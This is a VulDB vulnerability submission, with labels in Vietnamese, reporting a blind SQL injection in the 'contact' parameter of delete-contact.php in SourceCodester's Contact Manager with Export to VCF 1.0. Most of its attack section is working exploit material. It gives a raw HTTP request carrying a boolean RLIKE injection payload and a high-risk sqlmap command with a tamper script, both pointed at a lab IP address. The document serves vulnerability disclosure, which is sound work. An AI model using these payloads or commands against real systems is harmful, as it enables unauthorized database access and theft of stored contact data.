| tiêu đề | https://www.sourcecodester.com/php/17556/contact-manager-export- Web 1 SQL Injection |
|---|
| Mô tả | Exploit Title:
SQL Injection Vulnerability in Contact Manager with Export to VCF
Date:
04/02/2025
Exploit Author:
Xcode0x
Twitter: @xcode0x
Vendor Homepage:
[https://github.com/]
Software Link:
[Not provided]
Version:
v1.0
Tested on:
Kali Linux
SQL Injection Details:
The web application is vulnerable to a blind SQL injection on the endpoint /contact-manager-with-export-to-vcf/endpoint/delete-contact.php. By injecting SQL payloads into the contact parameter, attackers can execute arbitrary SQL commands on the database, potentially extracting sensitive information or gaining unauthorized access to the system.
Endpoint:
GET /contact-manager-with-export-to-vcf/endpoint/delete-contact.php?contact=
Example Vulnerable Request:
http
Copy
Edit
GET /contact-manager-with-export-to-vcf/endpoint/delete-contact.php?contact=' RLIKE (SELECT (CASE WHEN (3542=3542) THEN '' ELSE 0x28 END)) AND 'QGIz'='QGIz HTTP/1.1
Host: 192.168.70.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Cache-Control: max-age=0
Proof of Concept (POC):
Send the payload contact=' RLIKE (SELECT (CASE WHEN (3542=3542) THEN '' ELSE 0x28 END)) AND 'QGIz'='QGIz in the contact parameter using SQLMap or manually with a tool like Burp Suite.
The server confirms the payload execution without errors, indicating a successful SQL injection vulnerability.
SQLMap Command:
bash
Copy
Edit
sqlmap -u "http://192.168.70.3/contact-manager-with-export-to-vcf/endpoint/delete-contact.php?contact=" --random-agent --level 5 --risk 3 --threads=10 --tamper=space2comment --dbms=mysql --technique=B --where="RLIKE (SELECT CASE WHEN (4038=4038) THEN 69 ELSE 0x28 END)" --batch |
|---|
| Nguồn | ⚠️ https://www.sourcecodester.com/php/17556/contact-manager-export-vcf-using-php-and-mysql-source-code.html |
|---|
| Người dùng | xcode0x (UID 39076) |
|---|
| Đệ trình | 04/02/2025 11:18 (cách đây 1 Năm) |
|---|
| Kiểm duyệt | 10/02/2025 10:06 (6 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 295072 [SourceCodester Contact Manager with Export to VCF 1.0 delete-contact.php Liên hệ Tiêm SQL] |
|---|
| điểm | 20 |
|---|